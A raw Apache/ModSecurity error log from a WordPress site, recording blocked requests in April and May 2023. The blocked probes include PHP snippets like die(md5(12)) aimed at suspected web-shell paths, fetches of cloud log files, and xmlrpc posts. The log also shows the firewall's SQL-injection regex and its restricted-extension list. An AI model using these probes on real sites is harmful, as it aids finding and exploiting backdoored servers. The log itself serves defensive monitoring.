"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/exs-church/fnc.php"] [unique_id "ZEoXN7G39a66SuvhLIIONgAAAM8"] [Thu Apr 27 17:42:43.365413 2023] [:error] [pid 8454:tid 140296345626368] [client 152.89.196.77:57954] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/classic/inc/index.php"] [unique_id "ZEr6Y9dJ-DDWr87KXKU_TQAAAQM"] [Thu Apr 27 19:47:24.582701 2023] [:error] [pid 8662:tid 140296146859776] [client 5.188.62.76:39042] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZEsXnIYF2yimOnArbElTPAAAAdI"] [Fri Apr 28 06:51:37.252214 2023] [:error] [pid 12568:tid 140458567063296] [client 170.187.188.150:50880] [client 170.187.188.150] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/data/owncloud.log"] [unique_id "ZEuzSc4DoGw8q37wTTLJBAAAAFM"] [Fri Apr 28 07:04:32.478358 2023] [:error] [pid 12569:tid 140458550277888] [client 170.187.188.150:51870] [client 170.187.188.150] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/data/owncloud.log"] [unique_id "ZEu2UPEji1Z3PIS-O-iiVgAAAJU"] [Fri Apr 28 07:06:41.165257 2023] [:error] [pid 12832:tid 140458676168448] [client 170.187.188.150:52014] [client 170.187.188.150] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/data/nextcloud.log"] [unique_id "ZEu20ada4GH9XvrqVIPdPwAAAMY"] [Fri Apr 28 07:12:54.094144 2023] [:error] [pid 12567:tid 140458798286592] [client 170.187.188.150:52454] [client 170.187.188.150] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/data/nextcloud.log"] [unique_id "ZEu4RiDfhP5wxU3kzZg30gAAAAA"] [Fri Apr 28 07:18:13.308544 2023] [:error] [pid 12832:tid 140458650990336] [client 170.187.188.150:52812] [client 170.187.188.150] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/nextcloud/data/nextcloud.log"] [unique_id "ZEu5hada4GH9XvrqVIPd0QAAAMk"] [Fri Apr 28 07:20:17.615813 2023] [:error] [pid 12567:tid 140458798286592] [client 170.187.188.150:52942] [client 170.187.188.150] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/owncloud/data/owncloud.log"] [unique_id "ZEu6ASDfhP5wxU3kzZg3-AAAAAA"] [Fri Apr 28 07:24:23.987364 2023] [:error] [pid 12567:tid 140458550277888] [client 170.187.188.150:53336] [client 170.187.188.150] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/owncloud/data/owncloud.log"] [unique_id "ZEu69yDfhP5wxU3kzZg4AQAAABU"] [Fri Apr 28 08:07:25.966441 2023] [:error] [pid 12569:tid 140458541885184] [client 92.222.70.66:56158] [client 92.222.70.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:code: die(md5(12));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/extension_mod.php"] [unique_id "ZEvFDfEji1Z3PIS-O-ijgAAAAJY"], referer: investigacionperu.com [Fri Apr 28 08:09:23.629805 2023] [:error] [pid 12832:tid 140458659383040] [client 92.222.70.66:56312] [client 92.222.70.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:code: die(md5(12));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/library_ext.php"] [unique_id "ZEvFg6da4GH9XvrqVIPfSwAAAMg"], referer: investigacionperu.com [Fri Apr 28 08:13:42.069175 2023] [:error] [pid 30873:tid 140458533492480] [client 92.222.70.66:56650] [client 92.222.70.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:code: die(md5(12));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/2023/04/extension_mod.php"] [unique_id "ZEvGhpIZgNpN0Jr5h5ErqQAAARc"], referer: investigacionperu.com [Fri Apr 28 08:15:29.314153 2023] [:error] [pid 30873:tid 140458659383040] [client 92.222.70.66:56834] [client 92.222.70.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:code: die(md5(12));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hyper-cache/extension_mod.php"] [unique_id "ZEvG8ZIZgNpN0Jr5h5EryQAAAQg"], referer: investigacionperu.com [Fri Apr 28 08:15:46.515783 2023] [:error] [pid 12568:tid 140458659383040] [client 92.222.70.66:56850] [client 92.222.70.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:code: die(md5(12));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/extension_mod.php"] [unique_id "ZEvHAs4DoGw8q37wTTLJ8gAAAEg"], referer: investigacionperu.com [Fri Apr 28 10:23:45.065173 2023] [:error] [pid 30873:tid 140458701346560] [client 5.188.62.26:38914] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZEvlAZIZgNpN0Jr5h5EycwAAAQM"] [Fri Apr 28 18:02:27.198875 2023] [:error] [pid 30873:tid 140458684561152] [client 37.46.131.140:42812] [client 37.46.131.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "ZExQg5IZgNpN0Jr5h5FFtgAAAQU"] [Sat Apr 29 18:40:59.500178 2023] [autoindex:error] [pid 2169:tid 139791382640384] [client 20.125.136.128:60868] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Apr 29 22:16:17.974601 2023] [:error] [pid 1961:tid 139791110694656] [client 5.188.62.21:41114] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZE3dgYZnZm1086xSNsSNUQAAABg"] [Sun Apr 30 08:27:56.362942 2023] [:error] [pid 26757:tid 139685976315648] [client 173.252.83.18:37034] [client 173.252.83.18] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-524287"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZE5s3Jjt5KaX-rdbqa_q1gAAAI0"] [Sun Apr 30 12:18:16.645448 2023] [:error] [pid 27023:tid 139685967922944] [client 152.89.196.77:56330] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/animated-live-wall/plugin.php"] [unique_id "ZE6i2EBIy_VbxNHNjy498AAAAM4"] [Sun Apr 30 17:08:46.431747 2023] [:error] [pid 27023:tid 139685925959424] [client 5.188.62.76:45400] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZE7m7kBIy_VbxNHNjy5EbQAAANM"] [Sun Apr 30 19:44:03.611558 2023] [:error] [pid 26755:tid 139686001493760] [client 152.89.196.77:54668] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-content.php"] [unique_id "ZE8LU1KPzGg4BH8QbjBYbgAAAAo"] [Mon May 01 04:47:59.395285 2023] [:error] [pid 23071:tid 140306498377472] [client 152.89.196.77:59216] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:google: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/db-cache.php"] [unique_id "ZE-Kz7Vo3xKglqL0q5PLHQAAAJM"] [Mon May 01 16:39:15.933205 2023] [:error] [pid 23373:tid 140306582304512] [client 5.188.62.76:47882] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFAxg0qgRN-OnqvwyfCxXQAAAMk"] [Mon May 01 19:37:06.567664 2023] [:error] [pid 23373:tid 140306624268032] [client 5.188.62.140:56788] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFBbMkqgRN-OnqvwyfC3MAAAAMQ"] [Tue May 02 01:45:55.766300 2023] [autoindex:error] [pid 22424:tid 140306489984768] [client 49.51.187.248:47814] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex 